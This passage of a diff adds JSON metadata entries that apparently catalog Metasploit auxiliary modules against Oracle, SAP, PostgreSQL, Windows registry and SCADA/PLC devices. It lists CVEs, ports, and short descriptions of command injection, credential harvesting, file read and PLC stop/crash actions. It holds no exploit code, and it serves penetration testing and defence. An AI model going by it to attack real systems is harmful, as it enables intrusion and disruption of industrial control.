"auxiliary_admin/oracle/oracle_login": { + "name": "Oracle Account Discovery", + "fullname": "auxiliary/admin/oracle/oracle_login", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-11-20", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module 
uses a list of well known default authentication credentials\n to discover easily guessed accounts.", + "references": [ + "URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv", + "URL-https://seclists.org/fulldisclosure/2009/Oct/261" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oracle_sql": { + "name": "Oracle SQL Generic Query", + "fullname": "auxiliary/admin/oracle/oracle_sql", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oracle_sql", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/oraenum": { + "name": "Oracle Database Enumeration", + "fullname": "auxiliary/admin/oracle/oraenum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": "This module provides a simple way to scan an Oracle 
database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.", + "references": [], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/oracle/oraenum.rb", + "is_install_path": true, + "ref_name": "admin/oracle/oraenum", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr": { + "name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-14", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.", + "references": [ + "CVE-2008-5448", + "OSVDB-51342", + "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html", + "ZDI-09-003" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr2": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr2", + "aliases": [], + "rank": 300, + "disclosure_date": 
"2009-08-18", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", + "references": [ + "CVE-2009-1977", + "OSVDB-55903", + "CVE-2009-1978", + "OSVDB-55904", + "ZDI-09-058", + "ZDI-09-059" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/osb_execqr3": { + "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", + "fullname": "auxiliary/admin/oracle/osb_execqr3", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-13", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. 
This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", + "references": [ + "CVE-2010-0904", + "OSVDB-66338", + "ZDI-10-118" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", + "is_install_path": true, + "ref_name": "admin/oracle/osb_execqr3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/post_exploitation/win32exec": { + "name": "Oracle Java execCommand (Win32)", + "fullname": "auxiliary/admin/oracle/post_exploitation/win32exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-12-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module will create a java class which enables the execution of OS commands.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", + "is_install_path": true, + "ref_name": "admin/oracle/post_exploitation/win32exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/post_exploitation/win32upload": { + "name": "Oracle URL Download", + "fullname": "auxiliary/admin/oracle/post_exploitation/win32upload", + "aliases": [], + "rank": 300, + "disclosure_date": "2005-02-10", + "type": "auxiliary", + "author": [ + "CG " + ], + "description": "This 
module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.", + "references": [ + "URL-http://www.argeniss.com/research/oraclesqlinj.zip" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", + "is_install_path": true, + "ref_name": "admin/oracle/post_exploitation/win32upload", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/sid_brute": { + "name": "Oracle TNS Listener SID Brute Forcer", + "fullname": "auxiliary/admin/oracle/sid_brute", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-07", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module simply attempts to discover the protected SID.", + "references": [ + "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/", + "URL-http://www.red-database-security.com/scripts/sid.txt" + ], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/oracle/sid_brute.rb", + "is_install_path": true, + "ref_name": "admin/oracle/sid_brute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/oracle/tnscmd": { + "name": "Oracle TNS Listener Command Issuer", + "fullname": "auxiliary/admin/oracle/tnscmd", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-01", + "type": "auxiliary", + "author": [ + "MC " + ], + "description": "This module allows for the sending of arbitrary TNS commands in order\n to gather 
information.\n Inspired from tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd", + "references": [], + "platform": "", + "arch": "", + "rport": 1521, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/oracle/tnscmd.rb", + "is_install_path": true, + "ref_name": "admin/oracle/tnscmd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/pop2/uw_fileretrieval": { + "name": "UoW pop2d Remote File Retrieval Vulnerability", + "fullname": "auxiliary/admin/pop2/uw_fileretrieval", + "aliases": [], + "rank": 300, + "disclosure_date": "2000-07-14", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module exploits a vulnerability in the FOLD command of the\n University of Washington ipop2d service. By specifying an arbitrary\n folder name it is possible to retrieve any file which is world or group\n readable by the user ID of the POP account. This vulnerability can only\n be exploited with a valid username and password. 
The From address is\n the file owner.", + "references": [ + "OSVDB-368", + "BID-1484" + ], + "platform": "", + "arch": "", + "rport": 109, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/pop2/uw_fileretrieval.rb", + "is_install_path": true, + "ref_name": "admin/pop2/uw_fileretrieval", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/postgres/postgres_readfile": { + "name": "PostgreSQL Server Generic Query", + "fullname": "auxiliary/admin/postgres/postgres_readfile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module imports a file local on the PostgreSQL Server into a\n temporary table, reads it, and then drops the temporary table.\n It requires PostgreSQL credentials with table CREATE privileges\n as well as read privileges to the target file.", + "references": [], + "platform": "", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": null, + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/auxiliary/admin/postgres/postgres_readfile.rb", + "is_install_path": true, + "ref_name": "admin/postgres/postgres_readfile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/postgres/postgres_sql": { + "name": "PostgreSQL Server Generic Query", + "fullname": "auxiliary/admin/postgres/postgres_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "todb " + ], + "description": "This module will allow for simple SQL statements to be executed against a\n PostgreSQL instance given the 
appropriate credentials.", + "references": [ + "URL-https://www.postgresql.org" + ], + "platform": "", + "arch": "", + "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], + "targets": null, + "mod_time": "2024-03-05 17:49:13 +0000", + "path": "/modules/auxiliary/admin/postgres/postgres_sql.rb", + "is_install_path": true, + "ref_name": "admin/postgres/postgres_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "postgresql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/registry_security_descriptor": { + "name": "Windows Registry Security Descriptor Utility", + "fullname": "auxiliary/admin/registry_security_descriptor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Christophe De La Fuente" + ], + "description": "Read or write a Windows registry security descriptor remotely.\n\n In READ mode, the `FILE` option can be set to specify where the\n security descriptor should be written to.\n\n The following format is used:\n ```\n key: \n security_info: \n sd: \n ```\n\n In WRITE mode, the `FILE` option can be used to specify the information\n needed to write the security descriptor to the remote registry. 
The file must\n follow the same format as described above.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2024-12-16 14:55:10 +0000", + "path": "/modules/auxiliary/admin/registry_security_descriptor.rb", + "is_install_path": true, + "ref_name": "admin/registry_security_descriptor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "smb" + ], + "needs_cleanup": false, + "actions": [ + { + "name": "READ", + "description": "Read a Windows registry security descriptor" + }, + { + "name": "WRITE", + "description": "Write a Windows registry security descriptor" + } + ] + }, + "auxiliary_admin/sap/cve_2020_6207_solman_rce": { + "name": "SAP Solution Manager remote unauthorized OS commands execution", + "fullname": "auxiliary/admin/sap/cve_2020_6207_solman_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-10-03", + "type": "auxiliary", + "author": [ + "Yvan Genuer", + "Pablo Artuso", + "Dmitry Chastuhin", + "Vladimir Ivanov" + ], + "description": "This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of\n SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication\n checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,\n send HTTP request (SSRF), and execute OS commands on connected SMDAgent. 
Works stable in connected SMDAgent with Java version 1.8.\n\n Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected\n to SolMan as a user from which the SMDAgent service starts, usually the daaadm.", + "references": [ + "CVE-2020-6207", + "URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf", + "URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb", + "is_install_path": true, + "ref_name": "admin/sap/cve_2020_6207_solman_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "EXEC", + "description": "Exec OS command on connected agent" + }, + { + "name": "LIST", + "description": "List connected agents" + }, + { + "name": "SECSTORE", + "description": "Get file with SolMan credentials from connected agent" + }, + { + "name": "SSRF", + "description": "Send SSRF from connected agent" + } + ] + }, + "auxiliary_admin/sap/cve_2020_6287_ws_add_user": { + "name": "SAP Unauthenticated WebService User Creation", + "fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-07-14", + "type": "auxiliary", + "author": [ + "Pablo Artuso", + "Dmitry Chastuhin", + "Spencer McIntyre" + ], + "description": "This module leverages an unauthenticated web service to submit a job 
which will create a user with a specified\n role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid\n unnecessary system changes.", + "references": [ + "CVE-2020-6287", + "URL-https://github.com/chipik/SAP_RECON", + "URL-https://www.onapsis.com/recon-sap-cyber-security-vulnerability", + "URL-https://us-cert.cisa.gov/ncas/alerts/aa20-195a" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb", + "is_install_path": true, + "ref_name": "admin/sap/cve_2020_6287_ws_add_user", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "AKA": [ + "RECON" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Add the specified user" + }, + { + "name": "REMOVE", + "description": "Remove the specified user" + } + ] + }, + "auxiliary_admin/sap/sap_configservlet_exec_noauth": { + "name": "SAP ConfigServlet OS Command Execution", + "fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-01", + "type": "auxiliary", + "author": [ + "Dmitry Chastuhin", + "Andras Kabai" + ], + "description": "This module allows execution of operating system commands through the SAP\n ConfigServlet without any authentication.", + "references": [ + "OSVDB-92704", + "EDB-24963", + "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" + ], + "platform": "", + "arch": "", + "rport": 50000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 
3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_configservlet_exec_noauth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/sap/sap_igs_xmlchart_xxe": { + "name": "SAP Internet Graphics Server (IGS) XMLCHART XXE", + "fullname": "auxiliary/admin/sap/sap_igs_xmlchart_xxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-03-14", + "type": "auxiliary", + "author": [ + "Yvan Genuer", + "Vladimir Ivanov" + ], + "description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. 
Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.", + "references": [ + "CVE-2018-2392", + "CVE-2018-2393", + "URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf" + ], + "platform": "", + "arch": "", + "rport": 40080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_igs_xmlchart_xxe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "DOS", + "description": "Denial Of Service" + }, + { + "name": "READ", + "description": "Remote file read" + } + ] + }, + "auxiliary_admin/sap/sap_mgmt_con_osexec": { + "name": "SAP Management Console OSExecute", + "fullname": "auxiliary/admin/sap/sap_mgmt_con_osexec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module allows execution of operating system commands through the SAP\n Management Console SOAP Interface. 
A valid username and password must be\n provided.", + "references": [ + "URL-http://blog.c22.cc" + ], + "platform": "", + "arch": "", + "rport": 50013, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 50013 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb", + "is_install_path": true, + "ref_name": "admin/sap/sap_mgmt_con_osexec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/advantech_webaccess_dbvisitor_sqli": { + "name": "Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection", + "fullname": "auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-04-08", + "type": "auxiliary", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The\n vulnerability exists in the DBVisitor.dll component, and can be abused through malicious\n requests to the ChartThemeConfig web service. 
This module can be used to extract the site\n and project usernames and hashes.", + "references": [ + "CVE-2014-0763", + "ZDI-14-077", + "OSVDB-105572", + "BID-66740", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb", + "is_install_path": true, + "ref_name": "admin/scada/advantech_webaccess_dbvisitor_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/ge_proficy_substitute_traversal": { + "name": "GE Proficy Cimplicity WebView substitute.bcl Directory Traversal", + "fullname": "auxiliary/admin/scada/ge_proficy_substitute_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-22", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the\n gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM\n privileges. 
This module has been tested successfully on GE Proficy Cimplicity 7.5.", + "references": [ + "CVE-2013-0653", + "OSVDB-89490", + "BID-57505", + "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb", + "is_install_path": true, + "ref_name": "admin/scada/ge_proficy_substitute_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/modicon_command": { + "name": "Schneider Modicon Remote START/STOP Command", + "fullname": "auxiliary/admin/scada/modicon_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-05", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to perform administrative commands without authentication.\n This module allows a remote user to change the state of the PLC between\n STOP and RUN, allowing an attacker to end process control by the PLC.\n\n This module is based on the original 'modiconstop.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + 
"auxiliary_admin/scada/modicon_password_recovery": { + "name": "Schneider Modicon Quantum Password Recovery", + "fullname": "auxiliary/admin/scada/modicon_password_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon Quantum series of Ethernet cards store usernames and\n passwords for the system in files that may be retrieved via backdoor access.\n\n This module is based on the original 'modiconpass.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": null, + "mod_time": "2023-12-16 23:40:30 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_password_recovery.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_password_recovery", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/modicon_stux_transfer": { + "name": "Schneider Modicon Ladder Logic Upload/Download", + "fullname": "auxiliary/admin/scada/modicon_stux_transfer", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-05", + "type": "auxiliary", + "author": [ + "K. Reid Wightman ", + "todb " + ], + "description": "The Schneider Modicon with Unity series of PLCs use Modbus function\n code 90 (0x5a) to send and receive ladder logic. 
The protocol is\n unauthenticated, and allows a rogue host to retrieve the existing\n logic and to upload new logic.\n\n Two modes are supported: \"SEND\" and \"RECV,\" which behave as one might\n expect -- use 'set mode ACTIONAME' to use either mode of operation.\n\n In either mode, FILENAME must be set to a valid path to an existing\n file (for SENDing) or a new file (for RECVing), and the directory must\n already exist. The default, 'modicon_ladder.apx' is a blank\n ladder logic file which can be used for testing.\n\n This module is based on the original 'modiconstux.rb' Basecamp module from\n DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/auxiliary/admin/scada/modicon_stux_transfer.rb", + "is_install_path": true, + "ref_name": "admin/scada/modicon_stux_transfer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/moxa_credentials_recovery": { + "name": "Moxa Device Credential Retrieval", + "fullname": "auxiliary/admin/scada/moxa_credentials_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-07-28", + "type": "auxiliary", + "author": [ + "Patrick DeSantis ", + "K. Reid Wightman " + ], + "description": "The Moxa protocol listens on 4800/UDP and will respond to broadcast\n or direct traffic. The service is known to be used on Moxa devices\n in the NPort, OnCell, and MGate product lines. Many devices with\n firmware versions older than 2017 or late 2016 allow admin credentials\n and SNMP read and read/write community strings to be retrieved without\n authentication.\n\n This module is the work of Patrick DeSantis of Cisco Talos and K. 
Reid\n Wightman.\n\n Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,\n and NPort 5110 firmware 2.6.", + "references": [ + "CVE-2016-9361", + "BID-85965", + "URL-https://www.digitalbond.com/blog/2016/10/25/serial-killers/", + "URL-https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py", + "URL-https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02" + ], + "platform": "", + "arch": "", + "rport": 4800, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/scada/moxa_credentials_recovery.rb", + "is_install_path": true, + "ref_name": "admin/scada/moxa_credentials_recovery", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/multi_cip_command": { + "name": "Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands", + "fullname": "auxiliary/admin/scada/multi_cip_command", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-01-19", + "type": "auxiliary", + "author": [ + "Ruben Santamarta ", + "K. Reid Wightman ", + "todb " + ], + "description": "The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which\n implements the protocol. 
This module implements the CPU STOP command, as well as\n the ability to crash the Ethernet card in an affected device.\n\n This module is based on the original 'ethernetip-multi.rb' Basecamp module\n from DigitalBond.", + "references": [ + "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" + ], + "platform": "", + "arch": "", + "rport": 44818, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/scada/multi_cip_command.rb", + "is_install_path": true, + "ref_name": "admin/scada/multi_cip_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/scada/mypro_mgr_creds": { + "name": "mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)", + "fullname": "auxiliary/admin/scada/mypro_mgr_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2025-02-13", + "type": "auxiliary", + "author": [ + "Michael Heinzl" + ], + "description": "Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.\n The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. 